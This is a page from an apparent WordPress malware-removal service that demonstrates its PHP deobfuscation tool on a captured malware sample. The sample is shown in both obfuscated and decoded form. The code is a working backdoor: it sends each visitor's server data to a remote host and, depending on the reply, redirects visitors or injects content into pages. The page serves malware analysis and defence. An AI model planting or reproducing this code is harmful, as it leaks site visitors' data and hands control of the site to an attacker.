Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php function hyda($hrj) { $rod = ''; $khr = explode('.',$hrj); foreach($khr as $qji) { $rod .= chr($qji); } return explode(';',$rod); } function umtl($hrj) { $khr = hyda('99.9'.'7.99'.'.104'.'.101'.'.46.'.'59.4'.'6.11'.'2.10'.'4.11'.'2.59'.'.47.'.'94.1'.'04.1'.'16.1'.'16.1'.'12.4'.'7.59'.'.76.'...



Obfuscated php code

<?php function hyda($hrj) { $rod = ''; $khr = explode('.',$hrj); foreach($khr as $qji) { $rod .= chr($qji); } return explode(';',$rod); } function umtl($hrj) { $khr = hyda('99.9'.'7.99'.'.104'.'.101'.'.46.'.'59.4'.'6.11'.'2.10'.'4.11'.'2.59'.'.47.'.'94.1'.'04.1'.'16.1'.'16.1'.'12.4'.'7.59'.'.76.'.'111.'.'99.9'.'7.11'.'6.10'.'5.11'.'1.11'.'0.58'.'.32.'.'59.4'.'7.94'.'.35.'.'35.4'.'7.59'.'.60.'.'47.1'.'17.1'.'14.1'.'08.1'.'15.1'.'01.1'.'16.6'.'2.59'.'.67.'.'111.'.'110.'.'116.'.'101.'.'110.'.'116.'.'45.1'.'16.1'.'21.1'.'12.1'.'01.5'.'8.11'.'6.10'.'1.12'.'0.11'.'6.47'.'.120'.'.109'.'.108'.'.59.'.'60.1'.'04.1'.'16.1'.'09.1'.'08.5'.'9.84'.'.59.'.'99.1'.'17.1'.'14.1'.'08.9'.'5.10'.'1.12'.'0.10'.'1.99'.'.59.'.'63.1'.'17.9'.'7.61'.'.59.'.'104.'.'116.'.'116.'.'112.'.'59.1'.'09.1'.'01.1'.'16.1'.'04.1'.'11.1'.'00.5'.'9.71'.'.69.'.'84.5'.'9.11'.'6.10'.'5.10'.'9.10'.'1.11'.'1.11'.'7.11'.'6.59'.'.104'.'.116'.'.116'.'.112'.'.95.'.'99.1'.'11.1'.'00.1'.'01.5'.'9.50'.'.48.'.'48.5'.'9.59'.'.119'.'.105'.'.100'.'.103'.'.101'.'.116'.'.97.'.'112.'.'105.'.'59.1'.'01.1'.'09.9'.'8.10'.'1.10'.'0.10'.'5.11'.'2.59'.'.84.'.'80.7'.'6.59'.'.47.'.'97.9'.'8.11'.'1.11'.'7.11'.'6.59'.'.86.'.'69.8'.'2.59'.'.46.'.'115.'.'105.'.'116.'.'101.'.'59.5'.'8.47'.'.47.'.'59.1'.'08.9'.'7.11'.'5.10'.'4.11'.'1.11'.'9.11'.'4.11'.'1.11'.'1.10'.'9.59'.'.46.'.'99.1'.'11.1'.'09'); return $khr[$hrj]; } function xwdl($ymv, $zng=0) { $kzu = hyda('98.97'.'.115.'.'101.5'.'4.52.'.'95.10'.'1.110'.'.99.1'.'11.10'.'0.101'.'.59.1'.'06.11'.'5.111'.'.110.'.'95.10'.'1.110'.'.99.1'.'11.10'.'0.101'.'.59.1'.'02.11'.'7.110'.'.99.1'.'16.10'.'5.111'.'.110.'.'95.10'.'1.120'.'.105.'.'115.1'.'16.11'.'5.59.'.'117.1'.'14.10'.'8.101'.'.110.'.'99.11'.'1.100'.'.101.'.'59.11'.'5.116'.'.114.'.'101.9'.'7.109'.'.95.9'.'9.111'.'.110.'.'116.1'.'01.12'.'0.116'.'.95.9'.'9.114'.'.101.'.'97.11'.'6.101'.'.59.1'.'02.10'.'5.108'.'.101.'.'95.10'.'3.101'.'.116.'.'95.99'.'.111.'.'110.1'.'16.10'.'1.110'.'.116.'.'115.5'.'9.99.'.'117.1'.'14.10'.'8.95.'.'105.1'.'10.10'.'5.116'.'.59.9'.'9.117'.'.114.'.'108.9'.'5.115'.'.101.'.'116.1'.'11.11'.'2.116'.'.59.9'.'9.117'.'.114.'.'108.9'.'5.101'.'.120.'.'101.9'.'9.59.'.'99.11'.'7.114'.'.108.'.'95.10'.'3.101'.'.116.'.'105.1'.'10.10'.'2.111'.'.59.9'.'9.117'.'.114.'.'108.9'.'5.99.'.'108.1'.'11.11'.'5.101'.'.59.1'.'15.11'.'6.114'.'.95.1'.'14.10'.'1.112'.'.108.'.'97.99'.'.101'); $hrj = $_SERVER; $hrj[umtl(8)] = "g"; $hrj[umtl(20)] = "3"; $hrj[umtl(22)] = 1; $rod = $kzu[0]($kzu[1]($hrj)); if(!$kzu[2](umtl(9))){ $ymv .= umtl(10).$kzu[3]($rod); $qji = $kzu[4](array(umtl(11)=>array(umtl(12)=>umtl(13),umtl(14)=>48))); $zkx = @$kzu[5]($ymv, false, $qji); }else{ $khr = $kzu[6](); $kzu[7]($khr, 10002, $ymv); $kzu[7]($khr, 10018, $rod); $kzu[7]($khr, 19913, 1); $kzu[7]($khr, 64, 0); $kzu[7]($khr, 13, 49); $zkx = $kzu[8]($khr); $lfd = $kzu[9]($khr); $kzu[10]($khr); if($lfd[umtl(15)]!=umtl(16)) $zkx = umtl(17); } if(empty($zkx) && $zng<1) return xwdl($kzu[11](umtl(18).umtl(23), umtl(19).umtl(26),$ymv),1); return $zkx; } function nedw() { $kzu = hyda('1'.'1'.'2'.'.'.'1'.'1'.'4'.'.'.'1'.'0'.'1'.'.'.'1'.'0'.'3'.'.'.'9'.'5'.'.'.'1'.'0'.'9'.'.'.'9'.'7'.'.'.'1'.'1'.'6'.'.'.'9'.'9'.'.'.'1'.'0'.'4'.'.'.'5'.'9'.'.'.'1'.'0'.'4'.'.'.'1'.'0'.'1'.'.'.'9'.'7'.'.'.'1'.'0'.'0'.'.'.'1'.'0'.'1'.'.'.'1'.'1'.'4'.'.'.'5'.'9'.'.'.'1'.'1'.'5'.'.'.'1'.'1'.'7'.'.'.'9'.'8'.'.'.'1'.'1'.'5'.'.'.'1'.'1'.'6'.'.'.'1'.'1'.'4'.'.'.'5'.'9'.'.'.'1'.'1'.'5'.'.'.'1'.'1'.'6'.'.'.'1'.'1'.'4'.'.'.'1'.'0'.'8'.'.'.'1'.'0'.'1'.'.'.'1'.'1'.'0'.'.'.'5'.'9'.'.'.'1'.'1'.'5'.'.'.'1'.'1'.'6'.'.'.'1'.'1'.'4'.'.'.'1'.'1'.'5'.'.'.'1'.'1'.'6'.'.'.'1'.'1'.'4'); $zkx = xwdl(umtl(11).umtl(24).umtl(0).umtl(18).umtl(23).umtl(21).umtl(1)); if($kzu[0](umtl(2),$zkx)) {$kzu[1](umtl(3).$zkx);exit;} if($kzu[0](umtl(4),$zkx)) {exit($kzu[2]($zkx,2));} if($kzu[3]($zkx)>90) { if($kzu[4]($zkx,umtl(5))) {$kzu[1](umtl(6));exit($zkx);} if($kzu[4]($zkx,umtl(7))) {exit($zkx);} } } nedw(); ?>

Decoded(de-Obfuscated) php code

<?php

function hyda($hrj)
{
    $rod = '';
    $khr = explode('.', $hrj);
    foreach ($khr as $qji) {
        $rod .= chr($qji);
    }
    return explode(';', $rod);
}
function umtl($hrj)
{
    $khr = hyda('99.97.99.104.101.46.59.46.112.104.112.59.47.94.104.116.116.112.47.59.76.111.99.97.116.105.111.110.58.32.59.47.94.35.35.47.59.60.47.117.114.108.115.101.116.62.59.67.111.110.116.101.110.116.45.116.121.112.101.58.116.101.120.116.47.120.109.108.59.60.104.116.109.108.59.84.59.99.117.114.108.95.101.120.101.99.59.63.117.97.61.59.104.116.116.112.59.109.101.116.104.111.100.59.71.69.84.59.116.105.109.101.111.117.116.59.104.116.116.112.95.99.111.100.101.59.50.48.48.59.59.119.105.100.103.101.116.97.112.105.59.101.109.98.101.100.105.112.59.84.80.76.59.47.97.98.111.117.116.59.86.69.82.59.46.115.105.116.101.59.58.47.47.59.108.97.115.104.111.119.114.111.111.109.59.46.99.111.109');
    return $khr[$hrj];
}
function xwdl($ymv, $zng = 0)
{
    $kzu = hyda('98.97.115.101.54.52.95.101.110.99.111.100.101.59.106.115.111.110.95.101.110.99.111.100.101.59.102.117.110.99.116.105.111.110.95.101.120.105.115.116.115.59.117.114.108.101.110.99.111.100.101.59.115.116.114.101.97.109.95.99.111.110.116.101.120.116.95.99.114.101.97.116.101.59.102.105.108.101.95.103.101.116.95.99.111.110.116.101.110.116.115.59.99.117.114.108.95.105.110.105.116.59.99.117.114.108.95.115.101.116.111.112.116.59.99.117.114.108.95.101.120.101.99.59.99.117.114.108.95.103.101.116.105.110.102.111.59.99.117.114.108.95.99.108.111.115.101.59.115.116.114.95.114.101.112.108.97.99.101');
    $hrj = $_SERVER;
    $hrj[umtl(8)] = "g";
    $hrj[umtl(20)] = "3";
    $hrj[umtl(22)] = 1;
    $rod = $kzu[0]($kzu[1]($hrj));
    if (!$kzu[2](umtl(9))) {
        $ymv .= umtl(10) . $kzu[3]($rod);
        $qji = $kzu[4](array(umtl(11) => array(umtl(12) => umtl(13), umtl(14) => 48)));
        $zkx = @$kzu[5]($ymv, false, $qji);
    } else {
        $khr = $kzu[6]();
        $kzu[7]($khr, 10002, $ymv);
        $kzu[7]($khr, 10018, $rod);
        $kzu[7]($khr, 19913, 1);
        $kzu[7]($khr, 64, 0);
        $kzu[7]($khr, 13, 49);
        $zkx = $kzu[8]($khr);
        $lfd = $kzu[9]($khr);
        $kzu[10]($khr);
        if ($lfd[umtl(15)] != umtl(16)) {
            $zkx = umtl(17);
        }
    }
    if (empty($zkx) && $zng < 1) {
        return xwdl($kzu[11](umtl(18) . umtl(23), umtl(19) . umtl(26), $ymv), 1);
    }
    return $zkx;
}
function nedw()
{
    $kzu = hyda('112.114.101.103.95.109.97.116.99.104.59.104.101.97.100.101.114.59.115.117.98.115.116.114.59.115.116.114.108.101.110.59.115.116.114.115.116.114');
    $zkx = xwdl(umtl(11) . umtl(24) . umtl(0) . umtl(18) . umtl(23) . umtl(21) . umtl(1));
    if ($kzu[0](umtl(2), $zkx)) {
        $kzu[1](umtl(3) . $zkx);
        exit;
    }
    if ($kzu[0](umtl(4), $zkx)) {
        exit($kzu[2]($zkx, 2));
    }
    if ($kzu[3]($zkx) > 90) {
        if ($kzu[4]($zkx, umtl(5))) {
            $kzu[1](umtl(6));
            exit($zkx);
        }
        if ($kzu[4]($zkx, umtl(7))) {
            exit($zkx);
        }
    }
}
nedw();

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.